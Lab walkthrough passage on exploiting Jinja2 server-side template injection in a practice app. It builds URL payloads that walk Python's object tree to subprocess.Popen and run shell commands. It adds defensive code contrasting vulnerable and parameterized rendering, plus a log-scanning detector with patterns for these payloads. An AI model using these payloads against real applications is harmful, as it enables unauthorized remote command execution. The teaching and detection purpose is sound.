
Exploitation

So now we know the following:

  • The application is vulnerable to SSTI
  • The injection point
  • The template engine
  • The template engine syntax

Since Jinja2 is a Python based template engine, we will look at ways to run shell commands in Python.

http://10.10.39.6:5000/profile/{% import os %}{{ os.system("whoami") }}

The above payload fails because Jinja2 is essentially a sub-language of Python that does not support the Python import statement inside a code block: Jinja2's own import tag loads other templates, not Python modules, so os is never defined inside the template.
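Why the first payload fails, and why a route like /profile/<name> is injectable at all, as an added example (this is not code from the original page or from the target application). It assumes, as a hypothetical, that the vulnerable application concatenates the URL parameter into the template source; the hardened variant passes the same value as a template variable, and the sandboxed variant shows what Jinja2's SandboxedEnvironment does and does not stop.

```python
# Added example (not code from the original page or the target application):
# why a /profile/<name> route is injectable, why the {% import os %} attempt
# fails, and how the same page renders safely. The "vulnerable" pattern below
# is an assumption about how the target builds its template.
from jinja2 import Environment, TemplateSyntaxError
from jinja2.sandbox import SandboxedEnvironment, SecurityError


def render_vulnerable(name: str) -> str:
    """Assumed vulnerable pattern: the URL parameter is concatenated into the
    template SOURCE, so any {{ ... }} or {% ... %} in it is evaluated."""
    return Environment().from_string("Hello " + name + "!").render()


def render_fixed(name: str) -> str:
    """Fix: the template source is a constant; user input is passed in as a
    variable, so it is treated as data and HTML-escaped on output."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}!").render(name=name)


def render_sandboxed(name: str) -> str:
    """Defence in depth when template source really must come from users:
    the sandbox refuses to resolve underscore-prefixed attributes such as
    __class__, which cuts off the object-tree walk described on this page.
    It does NOT stop plain expression evaluation such as {{ 7*7 }}."""
    return SandboxedEnvironment().from_string("Hello " + name + "!").render()


def probe(render, name: str) -> str:
    """Run one renderer on one input and report what happened."""
    try:
        return render(name)
    except SecurityError:
        return "blocked by sandbox"
    except TemplateSyntaxError as exc:
        return "template syntax error: " + str(exc)


if __name__ == "__main__":
    # Constructed inputs: a benign name, HTML, an arithmetic probe, the
    # import attempt from this page, and the start of the object walk.
    for label, name in [
        ("harmless", "alice"),
        ("html", "<b>alice</b>"),
        ("probe", "{{ 7*7 }}"),
        ("import attempt", "{% import os %}{{ os.system('whoami') }}"),
        ("object walk", "{{ ''.__class__.__mro__[1] }}"),
    ]:
        print(label)
        for fn in (render_vulnerable, render_fixed, render_sandboxed):
            print("  %-18s %s" % (fn.__name__, probe(fn, name)))
```

Running it shows the three behaviours side by side: the concatenating renderer evaluates 7*7 and resolves the object walk to the root object class, the import attempt dies at parse time with a syntax error (Jinja2's import tag expects a template name followed by as), the parameterized renderer prints the input back as escaped text, and the sandbox raises SecurityError on __class__ while still evaluating arithmetic, which is why parameterization, not the sandbox, is the actual fix.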

Python lets us reach the class of any object through .__class__, so we can call it on an empty string. Every class has an attribute called .__mro__ (the method resolution order) that lets us climb the inheritance tree; since we want the root object, we take the second entry, .__mro__[1].

Classes in Python have a method called .__subclasses__() that lets us climb back down the object tree and list every class loaded in the interpreter.

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()}}

Everything is set! Now we just have to find an object that allows us to run shell commands.

If we look closely, the output displayed is just a Python list, so we can access any element by its index.

We can find the subprocess.Popen class in the dump and access it by its index, which is 401 in this case (the index depends on the interpreter version and on which modules the application has loaded, so it differs from target to target). Our payload now looks like this:

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()[401]}}

The above payload resolves the subprocess.Popen class; now all we have to do is call it. stdout=-1 is the numeric value of subprocess.PIPE, and .communicate() returns the (stdout, stderr) tuple, which is why the command output ends up in the rendered page:

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()[401] ("whoami", shell=True, stdout=-1).communicate() }}
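From the defender's side, the payload shapes above leave a distinctive trail in web-server access logs. The following detector is an added example, not part of the original page: it parses Common Log Format lines, URL-decodes the request path (bounded, so double-encoded payloads are seen too), and grades each request by whether it carries bare template delimiters or the dunder / Popen markers of the object walk. The log lines are constructed for this example and use only the standard library.

```python
# Added example, not from the original page: detection logic that flags the
# SSTI payload shapes shown above in web-server access logs. The log lines are
# constructed for this example (Common Log Format); only the standard library
# is used.
import re
from urllib.parse import unquote

# Object-walk and command-execution markers from the payloads on this page.
HIGH_RISK = re.compile(
    r"__(class|mro|subclasses|globals|builtins|import)__|\bpopen\b|os\.system",
    re.IGNORECASE,
)
# Bare template delimiters: a probe such as {{7*7}} or a {% ... %} block.
DELIMITERS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.DOTALL)

# Common Log Format: host ident user [time] "METHOD path HTTP/x" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign profile view, the 7*7 probe, the class dump,
# the Popen call, and an unrelated static asset request.
SAMPLE_LOG = """\
10.10.14.3 - - [12/Mar/2023:10:01:02 +0000] "GET /profile/alice HTTP/1.1" 200 512
10.10.14.3 - - [12/Mar/2023:10:01:09 +0000] "GET /profile/%7B%7B7*7%7D%7D HTTP/1.1" 200 498
10.10.14.3 - - [12/Mar/2023:10:01:15 +0000] "GET /profile/%7B%7B''.__class__.__mro__%5B1%5D.__subclasses__()%7D%7D HTTP/1.1" 200 48213
10.10.14.3 - - [12/Mar/2023:10:01:40 +0000] "GET /profile/%7B%7B''.__class__.__mro__%5B1%5D.__subclasses__()%5B401%5D(%22whoami%22,shell=True,stdout=-1).communicate()%7D%7D HTTP/1.1" 200 530
10.10.14.9 - - [12/Mar/2023:10:02:00 +0000] "GET /static/app.css HTTP/1.1" 200 2048
"""


def decode_path(path: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are seen."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line: str):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path = decode_path(m.group("path"))
    if HIGH_RISK.search(path):
        severity = "high"      # object walk / command execution attempt
    elif DELIMITERS.search(path):
        severity = "medium"    # template-evaluation probe
    else:
        severity = "none"
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": path,
        "status": int(m.group("status")),
        "severity": severity,
    }


def scan(log_text: str):
    """All suspicious findings from a block of log text, in file order."""
    findings = (classify(line) for line in log_text.splitlines())
    return [f for f in findings if f and f["severity"] != "none"]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:12} {f['ts']}  {f['path']}")
```

On the sample above this yields one medium finding (the 7*7 probe) followed by two high findings from the same client IP within a minute, which is the sequence an analyst should expect: a cheap probe first, then the class dump (note its unusually large response size), then the call. Grepping for the literal string {{ alone misses encoded requests, which is why decoding happens before matching.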

Last updated 2 years ago